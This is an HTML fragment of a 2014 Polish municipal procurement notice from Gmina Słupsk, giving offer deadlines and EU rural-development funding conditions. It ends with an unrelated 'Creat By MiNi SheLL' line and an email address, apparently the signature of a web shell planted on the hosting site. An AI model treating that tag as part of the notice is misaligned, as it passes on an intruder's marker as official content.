<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.06.2014 godzina 10:00, miejsce: Siedziba Zamawiającego - Urząd Gminy Słupsk, ul. Sportowa 34, 76-200 Słupsk, sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamawiający informuje, że niniejsza inwestycja jest przedsięwzięciem infrastrukturalnym ze środków Działanie 413 Wdrażanie lokalnych strategii rozwoju PROW na lata 2007-2013 dla operacji, które odpowiadają warunkom przyznania pomocy w ramach działania Odnowa i rozwój wsi i w przypadku narażenia Zamawiającego na utratę dofinansowania spowodowanym przez nie dotrzymanie obowiązków umownych, a w szczególności terminów realizacji z winy Wykonawcy, Zamawiający będzie dochodził pełnych roszczeń odszkodowawczych, zgodnie z zapisami zawartymi we wzorze umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com